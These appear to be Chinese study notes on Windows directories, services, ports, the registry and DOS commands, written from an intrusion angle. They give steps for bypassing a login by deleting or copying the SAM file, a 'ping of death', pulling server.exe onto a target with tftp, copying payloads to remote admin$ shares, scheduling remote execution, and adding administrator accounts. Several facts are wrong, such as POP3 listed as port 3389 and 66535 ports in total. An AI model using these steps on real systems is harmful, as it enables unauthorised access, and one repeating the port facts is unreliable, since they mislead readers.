系统目录
Windows
Program files
用户
Perflogs:是Windows7的日志信息,如磁盘扫描错误信息,删掉可以,但不建议删,删掉反而降低系统速度,perflogs是系统自动生成的。
注意:Windows-->system32-->sam //存放系统账号密码的文件!
如果想在不知道密码的情况下进入一台电脑,我们可以使用PE先进入,找sam文件将他删除,或者拷走。这样进入电脑时就不需要密码了。
系统是64位的,会自带x86目录,要安装32位的程序,则会安装在这里。
服务
服务是一种应用程序类型,它在后台运行。服务应用程序通常可以在本地和通过网络为用户提供一些功能,例如客户端/服务器应用程序、web服务器、数据库服务器已经其他基于服务器的应用程序。
根据端口区分服务!
服务的作用:服务决定了计算机的一些功能是否被启用,不同服务对应的功能不同。通过计算机提供的服务可以有效实现资源共享。
常见的服务:Web服务,dns服务(解析域名),dhcp服务(分发ip),邮件服务,Telnet服务(远程连接,和nc差不多),ssh服务,ftp服务,smb服务(文件共享)。
用telnet远程登陆:
前提条件:1.处于同一网段的内网主机 2.主机有公网ip
Windows2003开启telnet服务。
从Windows7开始,启动telnet换了方式,具体方式如下:
这样就可以用telnet连接03虚拟机了。
端口
可以认为是计算机与外界通讯交流的出口,按端口号分为3大类:公认端口;注册端口;动态/私用端口。一共有66535个端口
作用:一台拥有ip地址的主机可以提供许多服务,这些服务都是通过一个ip地址来实现的,那么实际上是通过ip地址+端口号来区分不同服务的。
端口并不是一一对应的。比如:一台www服务器使用80端口,但客户端可以使用不同于80端口的其他端口进行访问。
常见端口(重点,记!)
- HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080
-
FTP(文件传输)协议代理服务器常用端口号:21
3.Telnet(远程登录)协议代理服务器常用端口号:23
4.TFTP(trivial file transfer protocol),默认端口号为69/udp
5.SSH(安全登录),SCP(文件传输),端口重定向,默认的端口为22/tcp
6.POP3 Post Office Protocol(E-mail),默认的端口号为3389
7.TOMCAT,默认的款口号为8080
8.win 2003 远程登陆,默认的端口号为3389
9. oracle数据库,默认端口号1521
10.sql sever 数据库 默认端口:1433/tcp 1433/udp
11.qq 默认端口号为 1080/tcp
通过端口:信息搜集,目标探测,服务判断,系统判断,系统角色分析。
注册表
注册表是microsoft windows中的一个重要的数据库,用于存储喜用和应用程序的设置信息,在windows 3.0退出OLE技术的时候,注册表就已经出现,虽
有推出的windows NT是第一个从系统级别广泛使用注册表的操作系统,但是从microsoft windows 95开始,注册表才真正成为windows用户经常接触的
内容,并在其后的操作喜用中继续沿用至今。
打开注册表--
Win+r,输入regedit,就可以打开注册表
在这个编辑器中们首先会出现这五个根键,在这几个根键下则是无穷多的小文件夹彼此嵌套,完全掌握是一件不实际的事情。
注册表的作用——
注册表示windows操作喜用中的一个革新数据库,其中存放着各种参数,直接控制着windows的启动,硬件驱动程序的装载以及一些windows应用程序的运行,从而在整
个喜用中起着核心作用,这些作用包括了软件,硬件的相关配置和状态信息,比如注册表中保存有应用程序和资源管理器外科的初始条件,首选项和写在数据等,联网
计算机的整个系统的设置和各种许可,文件扩展名与应用程序的关联,硬件部件的描述,状态和属性,性能记录和其他底层的习用状态信息,以及其他数据等。
注册表结构——
1, HKEY_CLASSES_ROOT
管理文件作用,根据在windows中安装的应用称洗的扩展名,此根键指明其文件类型的名称,相应打开该文件所要调用的程序等等信息
2, HKEY_CURRENT_USER
管理系统当前的用户信息,在这个根键中保存了本地计算机中存放的当前登陆的用户信息,包括用户登录用户名和密码,在用户登录windows 98时,其信息从HKEY _USERS中相应的项拷贝到HKEY——CURRENT_USER中
3, HKEY_LOCAL_MACHINE
管理当前系统硬件配置,在这个根键中保存了本地计算机硬件配置数据,此根键下的子关键字包括在SYSTEM.DAT中,用来提供HKEY_LOCAL_MACHINE所需的信息,或者在远程计算机中可访问的一组键中
这个根键里面的许多子键与system.ini文件中的设置项类似
4,HKEY_USERS
管理系用的用户信息,在这个根键中保存了存放在本地计算机口令列表中的用户标识和密码列表,同时每个用户的预配置信息都存储在HYEY_CURRENT_USERS根键中,HKEY_USERS是远程计算机中访问的根键之一。
5,HKEY_CURRENT_CONFIG
管理当前用户的稀土永备至,在这个根键中保存着定义当前用户桌面配置(如显示器等等)的数据,该用户使用过的文档列表(MRU),应用程序配置和其他有关当前用户的windows 98 中文版的安装信息。
利用注册表防病毒——
不少计算机系统感染了网络病毒后,可能会在这些注册表中作出修改
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce\
下次开机运行,并且只运行一次的项
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
开机自动启动的项
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
网上有很多注册表入侵的例子!
DOS命令
Color:改变cmd颜色
在DOS中输入color ?,然后命令行会自动刷出一个列表,标明每个代码对应的颜色,然后就输入color,空格,再加上对应代码,就能把命令行中字符的颜色改成对应颜色。
一次性输入了两个字符,那么第一个字符会变成背景颜色,第二个字符会变成字体颜色。
Ping -t -l 65500
死亡ping(发送大于64k的文件并一直ping就成了死亡之ping)
Ping,-t,-l,65500和IP地址之间,都有空格隔开,从字面来拆分看,“ping”是这个指令的行为,“-t”就是命令不停,“-l”指IP结尾断点,IP不用解释了大家都懂.
在这里的65500,就是在让这个数据包尽可能的大,当然在真正的dos命令行中,如果输入了无效的数字,命令行会提示你输入范围必须在0到65500之间
TTL的意义在于,帮助判断操作系统,确定还能通过多少路由。
ipconfig
查看网卡所有的参数
ipconfig/all 可以查看关于网卡更详尽的参数
ipconfig/release 释放掉现在已经有的ip
ipconfig/renew 重新获得ip
systeminfo
显示这个主机的各个信息,包括各种硬件和软件。
可以查看补丁,通过没打的补丁找到系统漏洞。
这个在提权的时候会用到,查看系统打了哪些补丁,跟提权工做对比,返现没有打的补丁,可以进行提权。
局域网入侵
arp -a
用于遍历各个接口下的IP地址
Net view 查看局域网其他计算机名称
Shutdown -s -t 180 -c “Da4er”
-s 关机 -r 重启 -c+提示语句 -t+时间
shutdown -a 取消
cls 清屏
dir 查看目录
cd 切换目录
进入d盘:d:这样即可
start 打开文件或网址
copy con d:\123.txt 创建123.txt
hello word
ctrl+z 回车
Md 目录名 创建目录
Rd 123 删除文件夹
Ren 原文件名 新文件名 重命名文件名
Del 删除文件
Copy 复制文件
Move 移动文件
Tree 显示目录树
Net start 查看开启了哪些服务
Net start 服务名 开启服务
Net stop 服务名 停止服务
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe $">\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
print 文件名 打印文本文件
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:
doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
重点
net user 用户名 密码 /add 创建用户
net user guest /active:yes 激活guest(来宾用户)
net user 查看有哪些用户
net user 账号名 查看账号的属性
net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其有管理员的权限
net password 密码 更改系统登陆密码
net share 查看本地开启的共享
常用的windows服务
DHCP服务
动态主机设置协议(英语:Dynamic Host Configuration Protocol,DHCP)是一个局域网的网络协议,使用UDP协议工作,主要有两个用途:用于内部网或网络服务供应商自动分配IP地址;给用户用于内部网管理员作为对所有计算机作中央管理的手段。
二.服务器判断的顺序(如图):
1.本地缓存
2.本地数据
3,转发器
iis服务器
在一个web服务器搭建网站的三种方法:
1.同一个ip,不同端口
2.同一个ip,不同域名
3.不同ip,同一个端口(不常用) 意义不大
一个小型的数据流
